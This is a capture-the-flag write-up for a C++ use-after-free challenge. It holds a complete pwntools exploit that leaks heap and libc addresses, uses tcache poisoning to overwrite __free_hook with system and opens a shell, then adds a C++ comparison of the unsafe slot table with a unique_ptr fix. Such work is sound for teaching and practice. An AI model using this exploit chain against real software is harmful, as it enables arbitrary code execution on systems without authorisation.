[Pwn] cpp - cpt.shao

xp0int, posted on Apr 29 2021

A simple UAF challenge. At heart it is still a menu program; only the C++ reverse engineering is somewhat unpleasant to read. Once the logic is clear, you notice that after option 1 deletes a chunk, a pointer can still be written into it. A plain tcache poisoning takes care of it.

Because a libc address has to be leaked, first leak a heap address, then use one tcache poisoning to overwrite the size field of a chunk on the heap, changing 0x21 to 0x421; before doing so, a pile of chunks has to be allocated as placeholders. With the libc address leaked, a second tcache poisoning against `__free_hook` finishes it.

```py
# flag{U5e_uN1qu3_p7R_C0r3Ct1Y_P1s}
from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'
context.log_level = "debug"

# Local process by default, remote target when host and port are given.
if len(sys.argv) == 1:
    p = process('./chall')
elif len(sys.argv) == 3:
    p = remote(sys.argv[1], sys.argv[2])

se = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(delim, data)
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(delim, data)
sea = lambda delim,data :p.sendafter(delim, data)
rc = lambda numb=4096 :p.recv(numb)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
# Pad with bytes, not str: recv() returns bytes under Python 3.
uu32 = lambda data :u32(data.ljust(4, b'\0'))
uu64 = lambda data :u64(data.ljust(8, b'\0'))
info_addr = lambda tag, addr :p.info(tag + ': {:#x}'.format(addr))

def add(content, idx):
    # Option 0: allocate a chunk, fill it, store it in slot idx.
    sla("> ", "0")
    sea("> ", content)
    sla("> ", str(idx))

def puts(idx, content):
    # Option 1: delete slot idx, print the old contents, then write into the freed chunk.
    sla("> ", "1")
    sla("> ", str(idx))
    leak = ru("\n> ")
    se(content)
    return leak

# gdb.attach(p, gdbcmd)

# Leak a heap address through the tcache next pointer.
add("A"*7, 0)
add("B"*7, 1)
puts(0, "C"*7)
leak = puts(1, "D"*7)
leak = uu64(leak)
info_addr("leak", leak)

add("C"*7, 0)
puts(0, p64(leak)[:7])
add("D"*7, 0)
add("D"*7, 1)

# Placeholder chunks so the enlarged chunk has room behind it.
for i in range(2, 0x32):
    add("F"*7, i)

# First tcache poisoning: rewrite a chunk's size from 0x21 to 0x421.
puts(2, p64(leak)[:7])
puts(0, p64(leak)[:7])
puts(1, p64(leak)[:7])
add(p64(leak+0x58)[:7], 0)
add("B"*7, 1)
add(p64(0x421)[:7], 2)

# Freeing the enlarged chunk puts it in the unsorted bin and leaks a libc pointer.
leak_libc = puts(3, "E"*7)
leak_libc = uu64(leak_libc)
info_addr("leak", leak_libc)
libc = leak_libc - 0x1ebbe0
info_addr("libc", libc)

# Second tcache poisoning: point __free_hook at system, then free "/bin/sh".
puts(7, p64(leak)[:7])
puts(6, p64(leak)[:7])
puts(0, p64(leak)[:7])
add(p64(libc + 0x1eeb28)[:7], 0)
add("/bin/sh", 6)
add(p64(libc+0x55410)[:7], 7)

sla("> ", "1")
sla("> ", str(0))
p.interactive()
```
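The root cause the writeup describes is a dangling slot pointer: the delete option frees the chunk but leaves the stored address usable for a later write. The following is an added example, not code from the challenge binary or from the author, that models that menu slot table in C++ and sets the unsafe raw-pointer version beside the fix the flag hints at, owning each slot through `std::unique_ptr` so that removal and nulling are one operation. `Note`, `UnsafeTable`, `SafeTable` and the slot count are assumptions for illustration.

```cpp
#include <array>
#include <cstddef>
#include <cstring>
#include <memory>
#include <string>

// Constructed model of a menu-style note store; not the challenge binary.
struct Note {
    char data[0x18];  // payload the menu lets the user fill
};

// Unsafe pattern: raw owning pointers, and remove() deletes without
// clearing the slot, so a later write() dereferences freed memory (UAF).
struct UnsafeTable {
    std::array<Note*, 8> slots{};

    bool add(std::size_t idx, const std::string& s) {
        if (idx >= slots.size()) return false;
        slots[idx] = new Note{};
        std::strncpy(slots[idx]->data, s.c_str(), sizeof(Note::data) - 1);
        return true;
    }
    void remove(std::size_t idx) {
        if (idx < slots.size()) delete slots[idx];  // stale address stays in the slot
    }
    bool write(std::size_t idx, const std::string& s) {
        if (idx >= slots.size() || !slots[idx]) return false;
        // After remove(idx) this is a use-after-free: the null check cannot catch it.
        std::strncpy(slots[idx]->data, s.c_str(), sizeof(Note::data) - 1);
        return true;
    }
};

// Hardened pattern: unique_ptr owns the Note; reset() frees it and nulls the
// slot in one step, so write() on a removed slot fails the null check instead.
struct SafeTable {
    std::array<std::unique_ptr<Note>, 8> slots{};

    bool add(std::size_t idx, const std::string& s) {
        if (idx >= slots.size()) return false;
        slots[idx] = std::make_unique<Note>();
        std::strncpy(slots[idx]->data, s.c_str(), sizeof(Note::data) - 1);
        return true;
    }
    void remove(std::size_t idx) {
        if (idx < slots.size()) slots[idx].reset();  // free + null together
    }
    bool write(std::size_t idx, const std::string& s) {
        if (idx >= slots.size() || !slots[idx]) return false;
        std::strncpy(slots[idx]->data, s.c_str(), sizeof(Note::data) - 1);
        return true;
    }
};

// The unsafe table keeps the freed address around (no dereference here).
bool unsafe_slot_dangles() {
    UnsafeTable t;
    t.add(0, "AAAAAAA");
    t.remove(0);
    return t.slots[0] != nullptr;  // true: write(0, ...) would now hit freed memory
}

// The safe table rejects a write to a removed slot.
bool safe_write_after_remove() {
    SafeTable t;
    t.add(0, "AAAAAAA");
    t.remove(0);
    return t.write(0, "BBBBBBB");  // false: slot is empty, nothing freed is touched
}

// Writes to a live slot still work in the safe table.
bool safe_write_live() {
    SafeTable t;
    t.add(1, "AAAAAAA");
    return t.write(1, "BBBBBBB") && std::strcmp(t.slots[1]->data, "BBBBBBB") == 0;
}
```

The point of the hardened version is not the smart pointer by itself but that ownership and the slot's nullness can no longer disagree: there is no state in which the table holds an address that the allocator has already reclaimed.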